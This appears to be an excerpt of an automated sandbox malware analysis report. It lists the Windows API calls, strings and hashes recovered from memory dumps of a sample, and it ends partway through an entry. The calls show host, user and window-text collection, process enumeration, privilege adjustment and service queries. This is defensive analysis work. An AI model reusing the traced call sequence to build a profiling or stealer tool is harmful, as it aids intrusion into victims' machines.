                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ComputerNamelstrcpylstrlenwsprintf
                                  • String ID: Time
                                  • API String ID: 2137660125-3483776891
                                  • Opcode ID: 0d86f43cf8aff1c96b5c1221564300b5aa5e20fb4681d5bdfc798f6ad99b5944
                                  • Instruction ID: 3e6a45b9b470fbc869b3f012b6210870463603dc6c33235bc886a16c7cdcfef5
                                  • Opcode Fuzzy Hash: 0d86f43cf8aff1c96b5c1221564300b5aa5e20fb4681d5bdfc798f6ad99b5944
                                  • Instruction Fuzzy Hash: 43118FB5900228ABE714DB64CC8AFDB777CEB44601F0141A5F709E6142EF74AB88CBA4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$InformationTimeZone
                                  • String ID:
                                  • API String ID: 597776487-0
                                  • Opcode ID: d2a1c661eeab8fe2ccda79241d1e7e9c5a7a17148dfb404b2796e1f3565e554a
                                  • Instruction ID: 5944b97e054a481ea07992aa34664951c7c548f22b03f4b78325800655bf825d
                                  • Opcode Fuzzy Hash: d2a1c661eeab8fe2ccda79241d1e7e9c5a7a17148dfb404b2796e1f3565e554a
                                  • Instruction Fuzzy Hash: 45C14675E042599FDB11CF78CC81AEE7BF9EF45250F2541AAE884D7282EB309E49C750
                                  APIs
                                  • GetComputerNameW.KERNEL32(?,00000200), ref: 1001CBF5
                                  • lstrcpyW.KERNEL32(?,10077510), ref: 1001CC0B
                                  • wsprintfW.USER32 ref: 1001CC37
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ComputerNamelstrcpywsprintf
                                  • String ID: Remark
                                  • API String ID: 2045598086-3865500943
                                  • Opcode ID: 41c774fbd50cdb4b117e5591b852dfc880d65e9c52b26308cb5e22cccdd32118
                                  • Instruction ID: b3f827b17ac0b056ac70bbdc4e75ce27e2abaede2ac2f1ecf34c5bf4031cd120
                                  • Opcode Fuzzy Hash: 41c774fbd50cdb4b117e5591b852dfc880d65e9c52b26308cb5e22cccdd32118
                                  • Instruction Fuzzy Hash: 1421A8B5D40218AAEB14D764CD46FCA73ADEB00701F404596F708BA182EFB5AB848BD4
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 1000B9F0
                                  • GetTopWindow.USER32(00000000), ref: 1000B9FF
                                  • GetWindowTextLengthW.USER32(00000000), ref: 1000BA3C
                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 1000BA9E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Window$Text$ForegroundLength
                                  • String ID:
                                  • API String ID: 1471897267-0
                                  • Opcode ID: 3d17bf614a9b19a3ebe21ce52a279043732c0d42b8e04fd6304377340a176a11
                                  • Instruction ID: f5465e67f4ccfb34a7407618dca653fffe2592f44dfeaf943761977b0b72cbef
                                  • Opcode Fuzzy Hash: 3d17bf614a9b19a3ebe21ce52a279043732c0d42b8e04fd6304377340a176a11
                                  • Instruction Fuzzy Hash: F331B374A047059BD714CF28C81676BF7E9EF85644F008A1EF88A8B250EBB4EA448792
                                  APIs
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 10011D6C
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 29c01c5153810fce39ab4b27d04142ac06fe52652b89456ca7a689fc236b89a3
                                  • Instruction ID: f3143f391f0517f03d2711e34f5f78023d9b528400ad956a5550ea6a7af18503
                                  • Opcode Fuzzy Hash: 29c01c5153810fce39ab4b27d04142ac06fe52652b89456ca7a689fc236b89a3
                                  • Instruction Fuzzy Hash: 8EA1F874E002199FEF24CFA4DC85BEE7BB6FF45354F104228E415AB292DB34A985CB61
                                  APIs
                                  • wsprintfW.USER32 ref: 10019464
                                    • Part of subcall function 1001CAE0: GetComputerNameW.KERNEL32(?,00000200), ref: 1001CB27
                                    • Part of subcall function 1001CAE0: lstrcpyW.KERNEL32(?,10077510), ref: 1001CB3D
                                    • Part of subcall function 1001CAE0: wsprintfW.USER32 ref: 1001CB69
                                    • Part of subcall function 1001CAE0: lstrlenW.KERNEL32(?), ref: 1001CB73
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: wsprintf$ComputerNamelstrcpylstrlen
                                  • String ID: +$tasktime
                                  • API String ID: 1932226818-2742412719
                                  • Opcode ID: a71690afc4177896275e162c754cac9cb1aa73dc16bf86ce23c540c854ca97f1
                                  • Instruction ID: d866fd5828c63630ef7eb7cf9d4e4059614f1f7a34494511adf1fe88d1a7de53
                                  • Opcode Fuzzy Hash: a71690afc4177896275e162c754cac9cb1aa73dc16bf86ce23c540c854ca97f1
                                  • Instruction Fuzzy Hash: A2F09A319082689FCB15DB14EC4579AB764FB44214F0080AAE80AAB282DB786A94CB90
                                  APIs
                                  • RegisterClassA.USER32(6C75A988), ref: 6C633314
                                  • CreateWindowExA.USER32(00000000,Message Window,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 6C63333F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ClassCreateRegisterWindow
                                  • String ID: Message Window
                                  • API String ID: 3469048531-1814804990
                                  • Opcode ID: 8d44c0d54e8d11377aa02abc504ed521bd67e97934bd4131de8a43382c894277
                                  • Instruction ID: 5c3bf44267bbe493b4afd95a8bec9094cee7ec131bbe159eb8aaaf5b9171dfa8
                                  • Opcode Fuzzy Hash: 8d44c0d54e8d11377aa02abc504ed521bd67e97934bd4131de8a43382c894277
                                  • Instruction Fuzzy Hash: 02E0E5F1316620BEEF048F60CC0AF763E78E70B220B928139B50586220DF7568409F78
                                  APIs
                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1006A608), ref: 10051727
                                  • _free.LIBCMT ref: 10051715
                                    • Part of subcall function 1004D9B2: HeapFree.KERNEL32(00000000,00000000,?,1005AA7F,10053BE7,00000000,10053BE7,?,?,1005AD24,10053BE7,00000007,10053BE7,?,10058D36,10053BE7), ref: 1004D9C8
                                    • Part of subcall function 1004D9B2: GetLastError.KERNEL32(10053BE7,?,1005AA7F,10053BE7,00000000,10053BE7,?,?,1005AD24,10053BE7,00000007,10053BE7,?,10058D36,10053BE7,10053BE7), ref: 1004D9DA
                                  • _free.LIBCMT ref: 100518E3
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                  • String ID:
                                  • API String ID: 2155170405-0
                                  • Opcode ID: 0a9afe676757fbac900952ed88f34385681e04743330df06d8487b9b6f66e1b8
                                  • Instruction ID: ae1caa736d89166b0db1018e9d2eac3869d6e7b19e4e3805c26ca96c628e2ac8
                                  • Opcode Fuzzy Hash: 0a9afe676757fbac900952ed88f34385681e04743330df06d8487b9b6f66e1b8
                                  • Instruction Fuzzy Hash: BF51B475D04219ABEB11DBA98C819EE77FCFF44250B2146ABE454D7291EB30AE48CB50
                                  APIs
                                  • _free.LIBCMT ref: 1005188D
                                  • _free.LIBCMT ref: 100518E3
                                    • Part of subcall function 100516BD: _free.LIBCMT ref: 10051715
                                    • Part of subcall function 100516BD: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1006A608), ref: 10051727
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$InformationTimeZone
                                  • String ID:
                                  • API String ID: 597776487-0
                                  • Opcode ID: c015f96a86172428804c22dab89c8f003ee46ac2ac38053fcf19e22af9cc9150
                                  • Instruction ID: 769e4cc0021f4a8ee0288658ed8287d3b7955195c702cdf757401fe74b216e31
                                  • Opcode Fuzzy Hash: c015f96a86172428804c22dab89c8f003ee46ac2ac38053fcf19e22af9cc9150
                                  • Instruction Fuzzy Hash: 8E21C676C0422967E731D7259C81EEA77BCEB41760F2103A7E898E2191EF706DC98A94
                                  APIs
                                  • __floor_pentium4.LIBCMT ref: 1000A96D
                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 1000A995
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: AllocVirtual__floor_pentium4
                                  • String ID:
                                  • API String ID: 4174053956-0
                                  • Opcode ID: ca2fadb11b78880022fd620a6bfc8c65ebc753ad8cf0125fa148e2bc209761ce
                                  • Instruction ID: 23107b6d779a8230bbb2392973feb2951df0fac37201d0ea6cbcca7204baf38b
                                  • Opcode Fuzzy Hash: ca2fadb11b78880022fd620a6bfc8c65ebc753ad8cf0125fa148e2bc209761ce
                                  • Instruction Fuzzy Hash: EF21F572704B149AE310DA39EC81A17F7E8EB453A1F014B3AFA86D6190EB71E890C791
                                  APIs
                                  • gethostname.WS2_32(?,00000100), ref: 1000BB53
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 1000BB6F
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 1000BBB4
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$gethostname
                                  • String ID:
                                  • API String ID: 2445153122-0
                                  • Opcode ID: 8220a0e5b3adec0511fb902189cbbe93e367e5842becd02a05235d6e5f907661
                                  • Instruction ID: 6ae64a3ab1f62f0a90e46849d51f8ee7803add071dfa6f0a7ff8e62bf13427a4
                                  • Opcode Fuzzy Hash: 8220a0e5b3adec0511fb902189cbbe93e367e5842becd02a05235d6e5f907661
                                  • Instruction Fuzzy Hash: 6A217E705083549FE310CF24CC05BABB7E8FF89714F000A5EF99996290EBB4AA48C7D2
                                  APIs
                                  • __EH_prolog3_catch_GS.LIBCMT ref: 6C634005
                                    • Part of subcall function 6C633021: _memset.LIBCMT ref: 6C63304F
                                    • Part of subcall function 6C633021: GetModuleFileNameA.KERNEL32(?,000000FF), ref: 6C633124
                                    • Part of subcall function 6C654AFA: _fgetc.LIBCMT ref: 6C654B43
                                    • Part of subcall function 6C654AFA: _sprintf.LIBCMT ref: 6C654B6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: FileH_prolog3_catch_ModuleName_fgetc_memset_sprintf
                                  • String ID: astrolog.as
                                  • API String ID: 2788110157-2633699130
                                  • Opcode ID: 839e80c15247f3ca6a7e0dbe40dd6bb352d899c3ba4301e88e12f0940157999a
                                  • Instruction ID: e6053afc20d35aa9a3065f258285baea64035d8dc79be9d106ba6efd6500bbe3
                                  • Opcode Fuzzy Hash: 839e80c15247f3ca6a7e0dbe40dd6bb352d899c3ba4301e88e12f0940157999a
                                  • Instruction Fuzzy Hash: 56F03A757462708ADF046FB4D9804A86A70EB2B74C310753F819AC6A40DBB5C084CB5E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71659396b64506a3f915f866e0e6d0d22f97fd8679baf7c5a502e18912562ded
                                  • Instruction ID: e7775b81cd5a67c59352e7e14569520216d341204271b2a9fcb849079d0047a8
                                  • Opcode Fuzzy Hash: 71659396b64506a3f915f866e0e6d0d22f97fd8679baf7c5a502e18912562ded
                                  • Instruction Fuzzy Hash: 7C31E2B2A007049BCB00CF68E8417DAF7E9EF55360F10822AF499D7651E775AA84CB90
                                  APIs
                                  • CompareStringW.KERNELBASE(00000800,00000001,?,00000001,100772E4,00000001,00000000,?,1008D880,?,?,1001EF86), ref: 1001EDB5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: CompareString
                                  • String ID:
                                  • API String ID: 1825529933-0
                                  • Opcode ID: 329863f654be77b7aa99de90060457f735ac7f351ea3de8cce6a6f4fc65d937a
                                  • Instruction ID: 4cdd57567af10c333d344e70a6ee3f7fe84ae6836bac624ff216e6e62135134a
                                  • Opcode Fuzzy Hash: 329863f654be77b7aa99de90060457f735ac7f351ea3de8cce6a6f4fc65d937a
                                  • Instruction Fuzzy Hash: A3F0FC33740316B7D620C58AAC85FD7B799E785755F0140AAF70C9F180DBE2984187D4
                                  APIs
                                  • SetEvent.KERNEL32(?,10081068), ref: 10020361
                                    • Part of subcall function 10020580: LoadLibraryW.KERNEL32(100783F4,10081068,?,?,?,?,1002037D), ref: 100205B5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: EventLibraryLoad
                                  • String ID:
                                  • API String ID: 298091905-0
                                  • Opcode ID: 3b4ecae4166f1dad3b18585e05198afbb3260a52d15318504b17a8d368628590
                                  • Instruction ID: e8bd7fe2e6ec80928e3e5f9c2cc51210f5708b32cd840354af321c6057caa1aa
                                  • Opcode Fuzzy Hash: 3b4ecae4166f1dad3b18585e05198afbb3260a52d15318504b17a8d368628590
                                  • Instruction Fuzzy Hash: 1E01B572D04748EBDB01CF98DD417DEF7B9FF1A214F108316F840B2251EB366A808A50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: __fsopen
                                  • String ID:
                                  • API String ID: 3646066109-0
                                  • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                  • Instruction ID: 243c9af958938cd62391156f9b254ff7fb73104295c9e343a7b84ad1b8aabbe5
                                  • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                  • Instruction Fuzzy Hash: 74C09B7254110C77CF111A42DC05E557F599FC1664F444020FB1C299609673D975968D
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,?,?,00000124), ref: 100275B4
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000124), ref: 100275BB
                                  • LookupPrivilegeValueA.ADVAPI32 ref: 100275EA
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,00000000,100787FC,?), ref: 10027604
                                  • GetLastError.KERNEL32(?,?,?,00000000,100787FC,?), ref: 1002760A
                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,100787FC,?), ref: 10027614
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002761E
                                  • LocalAlloc.KERNEL32 ref: 10027652
                                  • Process32First.KERNEL32(?,?), ref: 1002766F
                                  • OpenProcess.KERNEL32(00000410,00000000,00000128), ref: 1002768B
                                  • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 100276C2
                                  • K32GetProcessImageFileNameA.KERNEL32(00000000,?,00000104), ref: 100276D6
                                  • lstrcpy.KERNEL32(?,100789F8), ref: 100276ED
                                  • lstrcat.KERNEL32(?,100789F8), ref: 10027717
                                  • OpenProcessToken.ADVAPI32(?,00000008,?,?,?,?,?,?,?,?,00000040,00000400), ref: 10027782
                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,?,?,?,00000040,00000400), ref: 100277AA
                                  • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,00000040,00000400), ref: 100277BB
                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 100277D7
                                  • LookupAccountSidA.ADVAPI32(00000000,?,00000000,?), ref: 10027827
                                  • LookupAccountSidA.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 1002786C
                                  • lstrcpy.KERNEL32(?,?), ref: 10027886
                                  • GlobalFree.KERNEL32(00000000), ref: 10027891
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000040,00000400), ref: 100278A0
                                  • lstrcpy.KERNEL32(?,100789FC), ref: 100278C7
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,00000040,00000400), ref: 100278DE
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,00000040,00000400), ref: 100278EE
                                  • LocalSize.KERNEL32(?), ref: 10027904
                                  • LocalReAlloc.KERNEL32(?,?,00000042,?,?,?,?,?,?,?,00000040,00000400), ref: 10027916
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,00000040,00000400), ref: 10027931
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 1002794F
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 10027962
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 1002798A
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 100279A5
                                  • lstrlen.KERNEL32(?), ref: 100279C9
                                  • K32GetProcessMemoryInfo.KERNEL32 ref: 10027A07
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10027A5C
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10027A6E
                                  • CloseHandle.KERNEL32(?), ref: 10027A7D
                                  • CloseHandle.KERNEL32(00000000), ref: 10027A97
                                  • Process32Next.KERNEL32(?,?), ref: 10027AA6
                                  • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 10027ABC
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 10027ACB
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 10027AD2
                                  • LookupPrivilegeValueA.ADVAPI32 ref: 10027B01
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,00000000,100787FC,?), ref: 10027B1B
                                  • GetLastError.KERNEL32(?,?,?,00000000,100787FC,?), ref: 10027B21
                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,100787FC,?), ref: 10027B2B
                                  • CloseHandle.KERNEL32(?), ref: 10027B35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Process$lstrlen$Token$CloseHandle$AllocLocalLookupOpen$Filelstrcpy$AccountAdjustCreateCurrentErrorGlobalInformationLastPrivilegePrivilegesProcess32SizeValue$EnumFirstFreeImageInfoMemoryModulesNameNextSnapshotToolhelp32lstrcat
                                  • String ID: (
                                  • API String ID: 984035923-3887548279
                                  • Opcode ID: fd6585c358f96cfdc9b269380d91c8ebd9ab5436efa172c2696d2331d90e9987
                                  • Instruction ID: 62c872b500d01a8f27c623fe9ca2f01bd6a197061a5aa54a91127d6cb793920b
                                  • Opcode Fuzzy Hash: fd6585c358f96cfdc9b269380d91c8ebd9ab5436efa172c2696d2331d90e9987
                                  • Instruction Fuzzy Hash: 25F14C71508351AFE720CBA0DC89F9BB7EAFF84705F410919FA89D6190EBB4D548CB92
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32 ref: 100335A0
                                  • RegCloseKey.ADVAPI32(?), ref: 1003363A
                                  • GetTickCount.KERNEL32 ref: 100337CE
                                  • gethostname.WS2_32(?,00000040), ref: 100339EF
                                  • GetUserNameA.ADVAPI32(?,?), ref: 10033BBC
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000FF), ref: 10033BC6
                                  • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 10033DAA
                                  • GetDriveTypeA.KERNEL32(?,?,00000000), ref: 10033FC3
                                  • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?), ref: 10033FE7
                                  • lstrcpy.KERNEL32(?,10078F08), ref: 1003429C
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100342D2
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,00000000), ref: 1003452D
                                  • wsprintfA.USER32 ref: 10034551
                                  • OpenServiceA.ADVAPI32(00000000,10079798,000F01FF,?,?,?,?,00000000), ref: 1003456A
                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 1003457E
                                  • wsprintfA.USER32 ref: 1003459C
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100345FF
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1003487B
                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 10034ADA
                                  • FindFirstFileA.KERNEL32(?,?), ref: 10034B69
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 10034B79
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 10034B87
                                  • FindNextFileA.KERNEL32(00000000,00000010), ref: 10034BCC
                                  • EnumDisplaySettingsA.USER32(00000000,000000FF,?), ref: 10034E6B
                                  • _strftime.LIBCMT ref: 10035103
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000,10078DA8,80000000,?), ref: 1003514F
                                  • QueryServiceStatus.ADVAPI32(00000000), ref: 1003515F
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000,10078DB0,80000000,?), ref: 100351A8
                                  • QueryServiceStatus.ADVAPI32(00000000), ref: 100351B2
                                  • GetLocaleInfoW.KERNEL32(00000800,00000002,?,00000100), ref: 10035275
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000), ref: 100352A7
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,?,00000000,?,00000000,00000000), ref: 10035316
                                    • Part of subcall function 1001CEF0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 1001CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
